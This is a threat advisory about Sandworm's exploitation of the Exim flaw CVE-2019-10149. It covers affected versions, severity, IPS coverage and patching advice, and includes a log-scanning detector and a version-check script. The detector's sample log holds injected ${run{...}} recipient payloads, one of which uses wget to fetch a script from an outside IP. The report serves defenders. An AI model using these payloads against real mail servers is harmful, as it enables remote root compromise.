Threat Signal Report

NSA Advisory: Sandworm Actors Exploiting Exim MTA Vulnerability (CVE-2019-10149)

Description

Earlier in the week, the United States National Security Agency (NSA) issued an advisory highlighting active exploitation of the Exim MTA vulnerability CVE-2019-10149. According to the NSA, the in-the-wild attacks exploiting this vulnerability are linked to the group known as Sandworm, which is attributed to Russia. According to the advisory, an unauthenticated remote attacker can exploit the vulnerability by sending a specially crafted email and thereby execute commands with root privileges, allowing the attacker to install programs, modify data, and create new accounts.


What are the specifics of the alert?

The advisory is broad in scope: it is an informational piece emphasizing that nation-state actors are actively exploiting this flaw even though it was disclosed almost a year ago.


CVE-2019-10149, disclosed by Qualys on June 5, 2019, is a remote command execution/injection vulnerability in Exim, a mail transfer agent (MTA). It is caused by improper validation of the recipient address in the deliver_message() function and affects Exim versions 4.87 through 4.91. To exploit it, an attacker sends the targeted server a specially crafted email; when Exim processes the message for delivery, the attacker's injected command runs with root privileges.
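The crafted recipient address described above carries Exim string-expansion syntax (the ${run{...}} expansion item, as documented in the public Qualys advisory rather than on this page), so a defender can hunt for it in Exim's mainlog. The following is an added example, not code from the report or from Fortinet: it assumes mainlog-style lines (with log_selector +received_recipients for the "for" clause), and the log lines are constructed, not real telemetry. It also decodes the backslash-hex escapes (\x2F for "/") that public exploits used to slip past Exim's default local-part character restrictions.

```python
"""Added example: flag Exim mainlog lines whose recipient address carries
Exim string-expansion syntax, the injection primitive behind CVE-2019-10149.
The log lines in SAMPLE_LOG are constructed, not real telemetry."""
import re

# An address inside angle brackets.  Spaces must be allowed because an
# injected ${run{...}} payload contains them.
BRACKETED_ADDR_RE = re.compile(r"<([^<>]+)>")
# The trailing "for <recipients>" clause of an Exim "<=" arrival line
# (present when log_selector includes +received_recipients).
FOR_CLAUSE_RE = re.compile(r"\sfor\s(.+)$")
# Expansion items that execute code when the address is expanded.
EXEC_EXPANSION_RE = re.compile(r"\$\{\s*(run|dlfunc|readsocket)\s*\{", re.I)


def decode_escapes(s: str) -> str:
    """Undo the backslash escapes Exim's expander honours (\\xNN, \\t, \\n).
    Public exploits wrote '/' as \\x2F to bypass the default local-part
    character restrictions, so the decoded form must be checked too."""
    s = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)
    return s.replace("\\t", "\t").replace("\\n", "\n")


def classify_address(addr: str):
    """Return None for a normal address, 'expansion' when the local part
    contains '${', or 'command-execution' when it contains an executing
    expansion item such as ${run{...}} (raw or after escape decoding)."""
    verdict = None
    for candidate in (addr, decode_escapes(addr)):
        local_part = candidate.rsplit("@", 1)[0]
        if EXEC_EXPANSION_RE.search(local_part):
            return "command-execution"
        if "${" in local_part:
            verdict = "expansion"
    return verdict


def addresses_in(line: str):
    """Pull every address-like token out of one mainlog line."""
    found = BRACKETED_ADDR_RE.findall(line)
    m = FOR_CLAUSE_RE.search(line)
    if m:
        found.append(m.group(1))
    return found


def scan_log(text: str):
    """Return (line_number, address, verdict) for every flagged address."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for addr in addresses_in(line):
            verdict = classify_address(addr)
            if verdict:
                hits.append((n, addr, verdict))
    return hits


# Constructed sample in Exim mainlog format: two benign lines, one rejected
# RCPT carrying an escaped payload, and one accepted message whose
# recipient is a plain ${run{...}} expansion.
SAMPLE_LOG = r"""
2019-06-05 10:14:02 1hYkZq-0000Ab-3F <= alice@example.org H=mail.example.org [198.51.100.7] P=esmtp S=2048 for bob@corp.example
2019-06-05 10:14:02 1hYkZq-0000Ab-3F => bob <bob@corp.example> R=localuser T=local_delivery
2019-06-05 10:15:31 H=(x) [203.0.113.9] F=<a@b.c> rejected RCPT <${run{\x2Fbin\x2Fsh\t-c\t\x22id\x22}}@localhost>: restricted characters in address
2019-06-05 10:16:05 1hYkcB-0000Ad-9Q <= a@b.c H=(x) [203.0.113.9] P=esmtp S=512 for ${run{/bin/sh -c "wget http://192.0.2.5/x.sh -O /tmp/x.sh"}}@localhost
""".strip("\n")

if __name__ == "__main__":
    for n, addr, verdict in scan_log(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {addr}")
```

A legitimate local part never contains "${", so the weaker "expansion" verdict is still worth an alert; the "command-execution" verdict on the two constructed payload lines is what the IPS signature named in this report is designed to catch on the wire.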


What operating systems are affected?

All Linux (and other Unix-like) systems running Exim 4.87 through 4.91 inclusive are affected.

Exim 4.92, which contains the fix, and later versions up to the current 4.94 are unaffected.
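A quick way to triage hosts against the affected range is to parse the first line of `exim -bV`. The following is an added example, not code from the report or from Fortinet; the banner strings in SAMPLES are constructed, and the "verify" verdict for pre-release tags (4.92-RC1) is this example's own conservative choice, since the version number alone does not say whether such a build carries the fix.

```python
"""Added example: triage a host from its `exim -bV` banner against the
CVE-2019-10149 range (Exim 4.87 to 4.91 inclusive)."""
import re
import subprocess

AFFECTED_MIN = (4, 87)
AFFECTED_MAX = (4, 91)

# First line of `exim -bV`, e.g. "Exim version 4.91 #1 built 05-Jun-2019 ...".
# Patch levels (4.92.3) and pre-release tags (4.92-RC1) are both accepted.
BANNER_RE = re.compile(
    r"^Exim version (?P<major>\d+)\.(?P<minor>\d+)(?:\.(?P<patch>\d+))?"
    r"(?:[-_]?(?P<tag>RC\d+|dev))?",
    re.M,
)


def parse_banner(bv_output: str):
    """Return (major, minor, patch, tag), or None if this is not Exim's banner."""
    m = BANNER_RE.search(bv_output)
    if m is None:
        return None
    return (int(m["major"]), int(m["minor"]), int(m["patch"] or 0), m["tag"] or "")


def verdict_for(version) -> str:
    """'affected' for 4.87..4.91, 'not affected' otherwise, and 'verify'
    when a pre-release tag makes the number alone inconclusive."""
    major, minor, _patch, tag = version
    if tag:
        return "verify"
    return "affected" if AFFECTED_MIN <= (major, minor) <= AFFECTED_MAX else "not affected"


def assess(bv_output: str) -> str:
    """Verdict for a captured `exim -bV` output; 'unknown' if unparseable."""
    version = parse_banner(bv_output)
    return "unknown" if version is None else verdict_for(version)


def assess_local_host() -> str:
    """Run `exim -bV` on this host (requires Exim to be installed)."""
    try:
        out = subprocess.run(["exim", "-bV"], capture_output=True,
                             text=True, check=False).stdout
    except FileNotFoundError:
        return "unknown"
    return assess(out)


# Constructed banners for a stand-alone run (not output from real hosts).
SAMPLES = {
    "distro":  "Exim version 4.89 #1 built 14-Jun-2019 15:44:49\nCopyright (c) University of Cambridge, 1995 - 2017\n",
    "current": "Exim version 4.94 #2 built 02-Jun-2020 11:03:12\n",
    "rc":      "Exim version 4.92-RC1 #1 built 01-Feb-2019 08:00:00\n",
    "patched": "Exim version 4.92.3 #3 built 30-Sep-2019 20:41:17\n",
}

if __name__ == "__main__":
    for name, banner in SAMPLES.items():
        print(f"{name:8s} {parse_banner(banner)} -> {assess(banner)}")
```

One caveat that the version number cannot express: distributions backport the fix without changing the upstream version, so a Debian 9 host patched per DSA-4456-1 still reports 4.89 and is flagged "affected" here. Treat the verdict as a prompt to confirm through the package changelog or the distribution's security tracker, not as proof of exposure.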


What is the status of AV and IPS coverage?

Fortinet customers have been protected against exploitation of CVE-2019-10149 by the IPS signature Exim.deliver_message.Command.Injection since July 4, 2019 (IPS Definitions 14.643).

AV coverage is not applicable at this time. All known network IOCs are blocked by Web Filtering.


Have there been any patches or updates from vendors affected?

The fix is included in Exim 4.92, and patched packages for affected versions were pushed to the major Linux distribution repositories on June 5, 2019. If feasible, organizations running affected software should update to the latest version (4.94).


What else is possibly affected?

Cloud instances, virtual machines on hypervisors (VMware, VirtualBox, etc.), and standalone enterprise systems running Linux with an affected version of Exim are all vulnerable to this disclosure.


How serious is this threat?

CVE-2019-10149 carries a CVSS v3 base score of 9.8 (CRITICAL), vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Its Exploitability subscore of 3.9 is the highest the metric allows: the flaw is reachable over the network, has low attack complexity, and requires neither privileges nor user interaction, which is why a single crafted email suffices for exploitation.


Are there any other recommendations or mitigations suggested?

FortiGuard Labs recommends upgrading Exim to the latest version (4.94) as soon as possible; if that is not feasible, apply the fixed packages released by the affected vendors for the version in use.

For cloud-hosted mail servers that are not vendor-managed, organizations should either upgrade or, where possible, block external remote connections to the affected mail server(s) until the upgrade to the latest version is performed.

Telemetry


Definitions

Traffic Light Protocol

Color When Should it Be used? How may it be shared?

TLP: RED

Not for disclosure, restricted to participants only.
Sources may use TLP:RED when information cannot be effectively acted upon by additional parties, and could lead to impacts on a party's privacy, reputation, or operations if misused. Recipients may not share TLP:RED information with any parties outside of the specific exchange, meeting, or conversation in which it was originally disclosed. In the context of a meeting, for example, TLP:RED information is limited to those present at the meeting. In most circumstances, TLP:RED should be exchanged verbally or in person.

TLP: AMBER

Limited disclosure, restricted to participants’ organizations.
Sources may use TLP:AMBER when information requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Recipients may only share TLP:AMBER information with members of their own organization, and with clients or customers who need to know the information to protect themselves or prevent further harm. Sources are at liberty to specify additional intended limits of the sharing: these must be adhered to.

TLP: GREEN

Limited disclosure, restricted to the community.
Sources may use TLP:GREEN when information is useful for the awareness of all participating organizations as well as with peers within the broader community or sector. Recipients may share TLP:GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels. Information in this category can be circulated widely within a particular community. TLP:GREEN information may not be released outside of the community.

TLP: WHITE

Disclosure is not limited.
Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction.